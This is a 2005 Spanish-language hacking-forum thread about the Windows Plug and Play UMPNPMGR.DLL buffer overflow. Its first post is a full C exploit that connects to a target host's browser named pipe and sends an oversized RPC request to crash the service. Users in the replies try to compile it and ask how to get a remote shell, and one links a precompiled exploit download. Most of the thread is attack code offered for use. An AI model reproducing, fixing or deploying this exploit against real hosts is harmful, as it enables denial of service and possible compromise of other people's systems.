elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 19:00  


Tema destacado: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.  (Leído 3,173 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« en: 21 Octubre 2005, 20:05 »
Versiones afectadas: Windows XP, NT y 2000 all versions

Este error ocurre cuando el servicio de P&P maneja los mensajes malformados que contienen datos excesivos.
Esta vulnerabilidad facilita la escalada local de privilegio y el acceso remoto dependiendo del sistema operativo en cuestion. Un ataque acertado puede dar lugar a la ejecución del código arbitrario dando por resultado un atacante que gana privilegios del SISTEMA.

Esta vulnerabilidad no tiene relación con el bug anterior de "Microsoft Windows Plug and Play Buffer Overflow Vulnerability", pero ambas tienen panoramas similares de  ataque y los afectan.


Exploit:
Código:
#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")


unsigned char szBindString[] =
{
  0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
  0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
  0x40,0x4e,0x9f,0x8d,0x3d,0xa0,0xce,0x11,0x8f,0x69,0x08,0x00,0x3e,0x30,0x05,0x1b,
  0x01,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,
  0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};

unsigned char szRequestString[] =
{
0x05,0x00,
0x00,0x03,0x10,0x00,0x00,0x00,0x30,0x08,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x08,
0x00,0x00,0x00,0x00,0x0a,0x00,0x44,0xf7,0x12,0x00,0x00,0x04,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x04,0x00,0x00,0x48,0x00,0x54,0x00,0x52,0x00,0x45,0x00,0x45,0x00,
0x5c,0x00,0x52,0x00,0x4f,0x00,0x4f,0x00,0x54,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x00,0x00,0x00,0x08,0x00,0x00,0x01,0x00,0x00,0x00
};


int main(int argc, char* argv[])
{
  char szServerName[MAX_PATH];
  char szPipe[MAX_PATH];
  HANDLE hFile;
  NETRESOURCE nr;

  if (argc < 2){
  printf("[-] Usage: %s <host>\n", argv[0]);
  return -1;
  }

  if ( strlen(argv[1]) > (MAX_PATH - 50) ) {
  printf("[-] Host name %s is too long !\n");
  return -1;
  }

  printf("[+] Start connect host %s ... \n", argv[1]);
  wsprintf( szServerName, "\\\\%s\\pipe", argv[1] );
  nr.dwType = RESOURCETYPE_ANY;
  nr.lpLocalName = NULL;
  nr.lpRemoteName = szServerName;
  nr.lpProvider = NULL;
  if ( WNetAddConnection2(&nr, "", "", 0) != NO_ERROR ) {
  printf("[-] Connect to host %s failed !\n", argv[1]);
  return -1;
  }

  _snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser", argv[1]);
  hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL,
  OPEN_EXISTING, 0, NULL);

  if ( hFile == INVALID_HANDLE_VALUE ) {
  printf("[-] Open name pipe %s failed !\n", szPipe);
  return -1;
  }

  unsigned char szOutBuffer[0X1000];
  unsigned long nBytesRead;

  printf("[+] Start bind RPC interface ... \n");
  // bind rpc interface {8D9F4E40-A03D-11CE-8F69-08003E30051B}
  if ( ! TransactNamedPipe(hFile, szBindString, sizeof(szBindString),
  szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) {
  printf("[-] TransactNamedPipe (Binding) failed !\n");
  CloseHandle(hFile);
  return -1;
  }

  // send rpc request to call PNP_GetDeviceList (opnum 10)
  printf("[+] Start send RPC request ... \n");
  if ( ! TransactNamedPipe(hFile, szRequestString, sizeof(szRequestString),
  szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) {
  printf("[-] TransactNamedPipe (Binding) failed !\n");
  CloseHandle(hFile);
  return -1;
  }
  printf("[+] Attack host %s complete !\n", argv[1]);
  return 0;
}

fuente:www.securityreason.com

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
esse

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #1 en: 22 Octubre 2005, 04:16 »
$ gcc realplug.c -o realplug
/cygdrive/c/DOCUME~1/XXXX~1/CONFIG~1/Temp/ccfvHZpz.o:realplug.c:(.text+0x119):
 undefined reference to `_WNetAddConnection2A@16'
collect2: ld returned 1 exit status

no me compila :(
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #2 en: 22 Octubre 2005, 04:33 »
ese error.. es muy facil de corregir.. hasta mi profesor lo podria sacar jajaja
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #3 en: 22 Octubre 2005, 15:11 »
Ese error a mi también me da incluso incluyendo las librerías necesarias en opcines de proyecto 8)
En línea
Isirius
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.492



Ver Perfil
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #4 en: 22 Octubre 2005, 16:52 »
Hola tengo una pregunta en que vulnerabilidades a que sistemas afecta para conseguir una shell¿? Solo a win 2000 o tambien a xp sp2 ¿?
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #5 en: 22 Octubre 2005, 22:21 »
afecta a todos los Win, incluido XP SP2

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
esse

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #6 en: 23 Octubre 2005, 03:58 »
bueno, siento no saber de que es el error pero la vdd creo q estamos para ayudarnos :-\ siento ver q no   :'( , pero en fin alguien me podria ayudar, lo puedo compliar desde linux o se puede con el dev c :S ???

gracias ;)
En línea
Isirius
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.492



Ver Perfil
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #7 en: 23 Octubre 2005, 17:05 »
No consigo compilarlo alguien me ayuda¿?

Bueno los errores que me salen son estos.

--------------------Configuration: noses - Win32 Debug--------------------
Compiling...
noses.c
c:\documents and settings\isirius\escritorio\noses.c(192) : error C2143: syntax error : missing ';' before 'type'
c:\documents and settings\isirius\escritorio\noses.c(193) : error C2143: syntax error : missing ';' before 'type'
c:\documents and settings\isirius\escritorio\noses.c(198) : error C2065: 'szOutBuffer' : undeclared identifier
c:\documents and settings\isirius\escritorio\noses.c(198) : warning C4022: 'TransactNamedPipe' : pointer mismatch for actual parameter 4
c:\documents and settings\isirius\escritorio\noses.c(198) : error C2065: 'nBytesRead' : undeclared identifier
c:\documents and settings\isirius\escritorio\noses.c(207) : warning C4022: 'TransactNamedPipe' : pointer mismatch for actual parameter 4
Error executing cl.exe.

noses.obj - 4 error(s), 2 warning(s)

Gracias
« Última modificación: 23 Octubre 2005, 17:13 por Isirius » En línea
SlenX

Desconectado Desconectado

Mensajes: 71


¿ De verdad existe ?


Ver Perfil
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #8 en: 23 Octubre 2005, 18:11 »
En cyruxnet ya se ha publicado tambien esta vulnerabilidad y tambien han puesto el exploit ya compilado  :)

Lo podeis descargar desde aquí=>

http://www.cyruxnet.org/download/exploitsdb/MS05_047.rar

Saludos
En línea
Isirius
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.492



Ver Perfil
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #9 en: 23 Octubre 2005, 20:05 »
He probado el exploit y no me funciona a alguie le ha ido bien¿?
En línea
SeniorX


Desconectado Desconectado

Mensajes: 1.347


Programador Novato


Ver Perfil WWW
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #10 en: 23 Octubre 2005, 20:58 »
Cita de: esse en 22 Octubre 2005, 04:16
$ gcc realplug.c -o realplug
/cygdrive/c/DOCUME~1/XXXX~1/CONFIG~1/Temp/ccfvHZpz.o:realplug.c:(.text+0x119):
 undefined reference to `_WNetAddConnection2A@16'
collect2: ld returned 1 exit status

no me compila :(
esq men, tu estas compilando para linux pero el exploit esta vez es para windows.
En línea
Código:
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}
Precaución: La programacion puede producir adiccion
esse

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #11 en: 23 Octubre 2005, 21:32 »
seniorX , gracias :P ya lo compile pero como consigo la shell el puerto remoto por lo q vi en un netstat es el 445 a ese me conecto?? o yo tengo q dejar en escucha a alguno?

gracias
En línea
Isirius
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.492



Ver Perfil
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #12 en: 23 Octubre 2005, 22:16 »
A mi tambien me gustaria saberlo.
En línea
SlenX

Desconectado Desconectado

Mensajes: 71


¿ De verdad existe ?


Ver Perfil
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #13 en: 24 Octubre 2005, 15:57 »
Este exploit no es para conseguir una shell, lo único que hace es hacer un ataque tipo DoS. Los de Eeye han dicho que la vulnerabilidad puede ser utilizada para ejecutar código remotamente pero en este caso no es para eso. En el código fuente tambien creo que se distingue muy bien que no sirve para conseguir una shell.
En línea
Sierpe_777

Desconectado Desconectado

Mensajes: 25


Ver Perfil
Re: Microsoft Windows Plug And Play UMPNPMGR.DLL wsprintfW Buffer Overflow.
« Respuesta #14 en: 24 Octubre 2005, 16:51 »
